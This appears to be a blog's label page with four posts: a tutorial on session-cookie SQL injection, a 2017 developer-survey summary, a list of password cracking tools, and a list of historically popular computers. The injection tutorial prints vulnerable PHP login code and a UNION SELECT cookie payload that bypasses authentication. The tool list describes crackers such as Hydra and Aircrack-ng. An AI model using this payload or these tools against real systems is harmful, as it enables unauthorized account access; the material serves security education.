Showing posts with label Web And Social. Show all posts

Session Cookie Based SQL Injection

Short Description: SQL injection is most dangerous attack for web application, there are a lot of different websites are vulnerable to SQL injection. There are different variant for SQL injection like a simple SQL injection, blind SQL injection and Cookies based SQL injection. As you know the basic idea about cookies and their importance, cookies are represent some session and normally they count in cross site scripting attack (XSS) but what is cookies based SQL injection. In this article we will discuss cookies or session based SQL injection attack. 

Did you say a “Cookie” 

A cookie, also known as an HTTP cookie, web cookie, or browser cookie, is used for an origin website to send state information to a user’s browser and for the browser to return the state information to the origin site. The state information can be used for authentication, identification of a user session, user’s preferences, shopping cart contents, or anything else that can be accomplished through storing text data.
Cookies are not software. They cannot be programmed, cannot carry viruses, and cannot install malware on the host computer. However, they can be used by spyware to track user’s browsing activities – a major privacy concern that prompted European and US law makers to take action. Cookies could also be stolen by hackers to gain access to a victim’s web account.[1]


Where can I find my cookies?


Here is one way to get your stored cookies using your browser. This method is applied for Mozilla Firefox:


  1. From the Tools menu, select Options. If the menu bar is hidden, press Alt to make it visible.

  2. At the top of the window that appears, click Privacy.

 4. To modify settings, from the drop-down menu under “History”, select Use custom settings for history. Then enable or disable the settings by checking or unchecking the boxes next to each setting:


  • To allow sites to set cookies on your computer, select Accept cookies from sites. To specify which sites are always or never allowed to use cookies, click Exceptions.
  • To accept third-party cookies, check Accept third-party cookies. In the drop-down menu next to “Keep until:”, select the time period you wish to keep cookies on your computer.
  • To view the cookies stored on your computer, click Show Cookies… . In the window that appears, you can view the cookies on your computer, search for cookies, and remove any or all of the listed cookies.
  • To specify how the browser should clear the private data it stores, check Clear history when Firefox closes. Then, click Settings… . You can specify the items to be cleared when you close Firefox.

  4. Click OK until you return to the Firefox window.

To remove all cookies, from the Tools menu, select Clear recent history… . Check the items you want to clear, and then click Clear Now.



Are you talking about a Cookie Poisoning-like attack?


Cookie Poisoning attacks involve the modification of the contents of a cookie (personal information stored in a Web user’s computer) in order to bypass security mechanisms. Using cookie poisoning attacks, attackers can gain unauthorized information about another user and steal their identity.
Cookie poisoning is a known technique mainly for achieving impersonation and breach of privacy through manipulation of session cookies, which maintain the identity of the client. By forging these cookies, an attacker can impersonate a valid client, and thus gain information and perform actions on behalf of the victim. The ability to forge such session cookies (or more generally, session tokens) stems from the fact that the tokens are not generated in a secure way.[4]
To sum up, cookie-based SQL Injection is far to be a kind of Cookie Poisoning.

Cookie variables as a vector of SQL Injections:


SQL injection overview

A SQL injection attack consists of insertion or “injection” of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.
All data sent by the browser to a Web application, if used in a SQL query, can be manipulated in order to inject SQL code: GET and POST parameters, cookies and other HTTP headers. Some of these values ​​can be found in the environment variables. The GET and POST parameters are typically entered into HTML forms, they can contain hidden fields, i.e. information that is in form but not shown. GET parameters are contained in the URL and POST parameters are passed as HTTP content. Nowadays, and with the growth of Web 2.0 technologies, the GET and POST requests can also be generated by JavaScript.

Injecting malicious code in cookie:

Unlike other parameters, cookies are not supposed to be handled by users. Outside of session cookies which are (usually) random, cookies may contain data in clear or encoded in hexadecimal, base64, hashes (MD5, SHA1), serialized information. If we can determine the encoding used, we will attempt to inject SQL commands.



 function is_user($user) {

global $prefix, $db, $user_prefix;

if(!is_array($user)) {

        $user = base64_decode($user);

        $user = explode(“:”, $user);

$uid = “$user[0]“;

$pwd = “$user[2]“;

} else {

$uid = “$user[0]“;

$pwd = “$user[2]“;

}

if ($uid != “” AND $pwd != “”) {

    $sql = “SELECT user_password FROM “.$user_prefix.”_users WHERE user_id=’$uid’”;

$result = $db->sql_query($sql);

$row = $db->sql_fetchrow($result);

$pass = $row[user_password];

if($pass == $pwd && $pass != “”) {

return 1;

}

}

return 0;

}

The cookie contains base64 encoded form identifier, a field that is unknown and a password. If we use as a cookie 12345 ‘UNION SELECT’ mypass ‘:: mypass base64 encoded, the SQL query becomes:


  SELECT user_password FROM nk_users WHERE user_id=’12345′ UNION SELECT ‘mypass’

This query returns the password mypass, the same password as we have to provide. So we are connected.

How to inject the code in Cookies?

There are many HTTP interceptors and HTTP editors that can intercept the HTTP request before it is sent to the server. Then the tester can introduce his malicious SQL statement in the cookie field.
It’s like a get/post based SQL Injection, except that certain characters can’t be used. Forexample, ‘;‘ and ‘,‘ are typically treated as delimiters, so they endthe injection if they aren’t URL-encoded.

Conclusion

Cookie variables sometimes are not properly sanitized before being used in SQL query. This can be used to bypass authentication or make any SQL query by injecting arbitrary SQL code. For the web application audits, cookie variables should be added to the list of parameters to be checked.

For more Updates Visit: amadahmad.blogspot.com


Most Popular Programming Languages, Frameworks, Libraries, And Databases | 2017


Stack Overflow has released its much-anticipated Developer Survey 2017. This year, over 64,000 developers took part in the survey and shared their preferences. The survey revealed that for the fifth time in a row, JavaScript was the most commonly used programming language, followed by SQL and Java.
Stack Overflow is the world’s largest online community for programmers where they can learn languages, share code, and help each other. The website also releases its annual developer survey which gives a pretty solid idea of current programming trends, the work lives of developers, their habits and preferences, etc.
Since 2011, Stack Overflow is conducting this survey each year. This year’s survey is the biggest in Stack Overflow’s history with 64,000 developers taking part. Over the course of next few days, I’ll be telling you about some of the major highlights of this survey.

Most popular programming languages:

For the fifth time in a row, JavaScript has topped the list of the most commonly used programming languages. JavaScript is followed by SQL and Java.
The growth of Python is notable. It has overtaken PHP for the first time in five years. Here’s the list of the most popular programming languages:

Most popular frameworks, libraries:

In this category, Node.js and AngularJS continue to be the most commonly used technologies:

Most popular databases:

For the first time in its survey, Stack Overflow asked the developers what databases they were using. MySQL and SQL Server turned out to be the biggest databases:

For more Updates Visit: amadahmad.blogspot.com

10 Best Password Cracking Tools Of 2016


Password cracking is an integral part of digital forensics and pentesting. Keeping that in mind, we have prepared a list of the top 10 best password cracking tools that are widely used by ethical hackers and cyber-security experts. These tools–including the likes of Aircrack, John the Ripper, and THC Hydra–use different algorithms and protocols to crack the passwords on a Windows, Linux, and OS X system.

W
hat is password cracking?

In the field of cyber-security and cryptography, password cracking plays a very major role. It’s basically the process of recovering passwords to breach (or restore) the security of a computer system. You can easily relate it to repeatedly guessing your phone’s unlock pattern or pin.
So, why do we need to learn about password cracking and the tools used to do so? The purpose of password cracking revolves around recovering the forgotten passwords of our online accounts, computers, and smartphones. Password cracking is also used by system administrators as a preventive measure. They keep checking them on the regular basis to look for the weak links.
Talking about the process of password cracking, most methods involve the use of a computer that generates a vast set of password candidates. A desktop computer tests more than hundreds of millions of passwords per second. A password cracking tool performs this task easily and checks these candidates to reveal the actual password.
The time needed to crack a password is proportional to the length and strength of that password. That’s why users are advised to use complex passwords that are harder to guess. The password cracking speed of a tool also depends heavily on the cryptographic function that’s used to generate password hashes. Thus, a potent hashing function like bcrypt is preferred over the likes of SHA and MD5.

Types of password cracking attacks:

Here’s I’ll be listing various types of password cracking attacks that are generally used by attackers:
  • Dictionary attack: This attack uses a file that contains a list of words that are found in the dictionary. This mode matches different combinations of those words to crack your device open.
  • Brute force attack: Apart from the dictionary words, brute force attack makes use of non-dictionary words too.
  • Rainbow table attack: This attack comes along with pre-computed hashes. Thus, this method is faster.
There are lots of other password cracking techniques like phishing, spidering, social engineering, shoulder surfing etc. Soon, I’ll be discussing them in detail in another article. So, let’s get started with our list of the best password cracking tools of 2016.

Best Password Cracking Tools Of 2016:

Disclaimer: We are publishing this list just for educational purposes. We don’t promote malicious and unethical practices.

1) John the Ripper


John the Ripper is one of the most popular password cracking tools available around. This free password cracking tool is chiefly written in C programming language. Encompassing a customizable password cracker, John the Ripper comes as a combination of many password crackers into one suite.
Its ability to auto-detect password hashtypes, makes it a preferred choice of ethical hackers to ensure security. A pro version of this tool is also available, offering better features and more effectiveness. Just like the popular hacking tool Metasploit, John also belongs to the Raspid7 family of security tools.
Supported platforms: John the Ripper is available for all major platforms, including Linux, Windows, DOS, and OS X.
Download link: John the Ripper

2) Aircrack-ng


Aircrack-ng (ng stands for new generation) is one of the best password cracking tools that hackers use to bump their annoying neighbors off their own Wi-Fi. Note that just like John the Ripper, Aircrack-ng is not a single tool. Instead, it’s a complete software suite that’s used to play with Wi-Fi networks.
In this free suite, you get a tool named aircrack that hackers use to crack WPA or WEP passwords. After analyzing the encrypted password packets, aircrack uses its cracking algorithm to break the passwords.
Using the well know attack techniques like FMS, this password cracking tool makes your job easier. Recently, a new attack named “PTW” has been included in the suite, which reduces the number of initialization vectors to break a WEP key.
Supported platforms: Aircrack is available for Linux, OpenBSD, FreeBSD, OX X, Windows, Android
Download link: Aircrack-ng

3) RainbowCrack


As the name suggests, RainbowCrack makes use of rainbow tables to crack password hashes. Using a large-scale time-memory trade-off, RainbowCrack performs an advance cracking time computation. According to your convenience, you are free to use the command line or graphical interface of RainbowCrack.
Once the pre-computation stage is completed, this top password cracking tool is about hundreds of times faster than a brute force attack. You also don’t need to prepare the rainbow tables yourselves. The developers have made different rainbow tables for LM, NTLM, MD5 and SHA1 available for free.
RainbowCrack’s GPU acceleration is another key feature that allows this free password cracking tool to offload the runtime computation to GPUs, reducing the cracking time even further.
Supported platforms: RainbowCrack is available for Windows and Linux
Download link: RainbowCrack

4) Cain and Abel


This renowned password cracking tool is a dependable software to recover various types of passwords using multiple techniques. Cain and Able lets you easily perform Dictionary, Brute-Force, and Cryptoanalysis attacks to crack encrypted passwords.
This multi-purpose hacking tool also comes with the ability to sniff the networks, record VoIP conversations, recover network keys, decode scrambled passwords, and analyze routing protocols.
Cain and Abel has two components. While Cain is the front-end application to recover your passwords and perform sniffing, Able is a Windows NT service that performs the role of traffic scrambling.
Supported Platforms: Cain and Abel is available for Windows
Download link: Cain and Abel

5) THC Hydra


Compared to other top password cracking tools, THC Hydra performs hacking attacks using numerous network protocols, including the likes of Asterisk, FTP, HTTP-Proxy, MYSQL, XMPP, Telnet, and more. Using these protocols, THC Hydra performs super fast brute-force and dictionary attacks against a login page.
This free-to-use tool helps the pentesters and security researchers to know how easy it would be to gain remote access to a system. This tool also lets you add new modules to increase the functionality. Via its GitHub page, you can also participate in the development process of THC Hydra.
Supported Platforms: THC Hydra is available for Windows, Linux, Solaris, FreeBSD, OS X
Download link: THC Hydra

6) HashCat


HashCat claims to be the fastest and most advanced password cracking software available. Released as a free and open source software, HashCat supports algorithm like MD4, MD5, Microsoft LM hashes, SHA-family, MySQL, Cisco PIX, and Unix Crypt formats.
This password cracking tool comes in both CPU-based and GPU-based versions, HashCat and oclHashcat/cudaHashcat, respectively. Using a well-documented GPU acceleration, many algorithms can be easily cracked using this tool.
Different types of attacks performed by this tool include brute force attack, combinator attack, fingerprint attack, dictionary attack, hybrid attack, mask attack, table-lookup attack, PRINCE attack, permutation attack etc.
Supported Platforms: HashCat is available for Windows, Linux, OS X
Download link: HashCat

7) Crowbar


Crowbar is a brute forcing tool that’s widely popular in the pen testing scene. It gives you the control to decide what’s submitted to a web server. While most brute forcing tools use username and password to deploy SSH brute force, Crowbar makes use of SSH keys obtained during penetration tests.
This free tool is created to support the protocols that are rarely supported by other popular password cracking tools. Currently, Crowbar supports VNC key authentication, OpenVPN, SSP private key authentication, and Remote Desktop Protocol with NLA support.
Supported Platforms: Crowbar is available for Windows, Linux, OS X
Download link: Crowbar

8) OphCrack



Just like RainbowCrack, OphCrack is another popular and free password cracking tool that uses rainbow tables to crack the password hashes. It’s widely used to crack Windows log-in passwords. Thanks to its ability to import and use hashes from multiple formats and sources, OphCrack is known to crack the passwords of a Windows computer in few minutes.
Available conveniently as a Live CD, a pentester can use it and leave no trace behind. For cracking Windows XP, Vista, and 7, one can also grab freely available rainbow tables. For professional use, larger tables are available for purchase.
Supported Platforms: OphCrack is available for Windows
Download link: OphCrack

9) L0phtCrack


Just like OphCrack, L0phtCrack is known for easily cracking Windows passwords. Using a wide set of attacks like dictionary, hybrid, brute force, and rainbow tables, this password cracking tool can also be deemed useful in sniffing hashes.
It’s a great way to target Windows desktops, networked servers, Active Directory, and primary domain controllers. Its schedule routine audit functionality lets you perform scans at a convenient time.
Supported Platforms: L0phtCrack is available for Windows
Download link: L0phtCrack

10) DaveGrohl


For Mac OS X, DaveGrohl is an open source password cracking tool that’s preferred by the Apple security experts. With a completely modern object-oriented codebase in Version 3.0, DaveGrohl has been made more useful for developers and users.
With the help of dictionary and incremental attacks, this tool lets you crack a password in minutes. Its distributed mode allows you to perform attacks using different computers and crack the same password hash for faster results.
Supported Platforms: DaveGrohl is available for OS X
Download link: DaveGrohl
Thank you for Reading

10 Most Popular Computers In The History Of Computing



Some of the most popular computers in the computer history have left a mark behind as one of the most memorable machines the world ever saw. Some of these PCs made a history but could survive the history. Read more and know which computers were the kings of past era.
When personal computers were released almost half a century ago, the customers did not have a choice like they do have now. There were limited choices and on top of that, a customer had to decide the kind of software that would run on that PC for next a few upcoming years. So, just a few PCs were favorite among the computer users.

Here is a list of 10 Most Popular Computer In Computer History:

  • Timex Sinclair 1000

In 1981, Sinclair released a computer at a price of $100. This small computer, also known as the ZX81, ran on BASIC with just 2KB of RAM and 3.25 MHz processor. However, it made a perfect entry point for aspiring hobbyists who couldn’t spend a thousand dollars on a PC. With this price, the Timex Sinclair 1000 sold over 600,000 units in the United States and became one of the most popular computers of its time.
  • Tandy TRS-80

Tandy TRS-80 was launched in 1977. It offered its first model with 4K of RAM, a 1.77 MHz processor and a 12-inch monitor for $600. Later models of TRS-80 called TRS-100, greatly increased the computer’s capabilities, adding floppy support, extra ports, and more memory. The operating system called TRS-DOS (disk operating system) was the most popular computer OS predating MS-DOS. Tandy sold more than 200,000 units.
  • MSX

When the computer revolution had taken over the United States and Europe by companies like IBM, Commodore, Sinclair and Apple, Japan had its own hardware setups. The MSX was a unique computer which stood for Microsoft Extended Basic actually applied to a number of similar systems created by Japanese companies like Toshiba and Sony. MSX was the most popular machine in Japan those days.
  • NEC PC-98

If MSX was the most popular computer in Japan then NEC’s PC-98 was a big success in itself. NEC PC-98 was released in 1982. It ran on a 5 MHz Intel 8086 CPU, had two display controllers, and a base 128KB of RAM. The PC-98 was a powerful computer for its time, and NEC ruled the Japanese market with roughly a 50 percent market share.
  • iMac (One of the most popular computers)

iMac got instant popularity when Apple began advertising it on the name of its uniqueness. When they released the iMac in 1998, they advertised its colorful body by criticizing the beige color of drab PCs.It’s a simple, all-in-one design that incorporates all of the computer’s components into the monitor housing. Easy to move, easy to set up.
  • Commodore Amiga

The Commodore Amiga was released in 1987. It was released following the grand success of computers like the Commodore 64 and Apple II. It was newer, faster, better. The Amiga 500 made the jump from an 8-bit CPU up to 32 bits and 7 MHz of speed. The computer shipped with 512KB of RAM, support for up to 4096 colors, and an internal 3.5-inch floppy drive — just for a launch price of $700.
  • Apple II (One of the most popular computers)

Apple II was released in 1977, the same year Sinclair released the $100 Timex Sinclair 1000. However, this second computer from Apple was a great success even though it cost $1300. It was built on the design of the Apple I by retaining a simple 1MHz processor and 4KB of RAM and adding a case and keyboard.ZXSpectrum
  • ZX Spectrum

ZX Spectrum was a huge success in the UK and eventually it was the most popular computer of its time. It was launched in 1982. The design was similar: A small, affordable (£ 125 in the U.K.) system that incorporated a keyboard into its body. But the Spectrum was a much better computer than its predecessor, thanks to 16KB of RAM and a real hardware keyboard.
  • IBM PC: (One of the most popular computers)

IBM PC can be said as the first generation PC which is still trending in the market. The Intel-based, Windows-running computers that have dominated the market since the 1990s were born from the IBM PC.
Within a few years, all x86 computers — those using Intel’s processors — were compatible with the IBM PC and virtually identical to IBM’s design. They all ran MS-DOS, and the x86 PC field went on to become the de facto standard.
  • Commodore 64:

The Commodore 64 is the single most popular computer system ever sold. Released in 1982, the Commodore 64 had a 1MHz CPU but it came with two big draws:
  • A powerful, programmable sound chip and,
  • powerful graphics for a 1982 computer.
What made it stand out from the race of PCs was its reasonable cost of $595, 64KB of RAM and that could be plugged into a TV, making it a hybrid computer/video game console.
If you also know the most popular computer of its time which made a difference and you would like to share about that, you can put your views in the comments below. Also, don’t forget to mention your first machine’s specification.
For more Visit Us: amadahmad.blogspot.com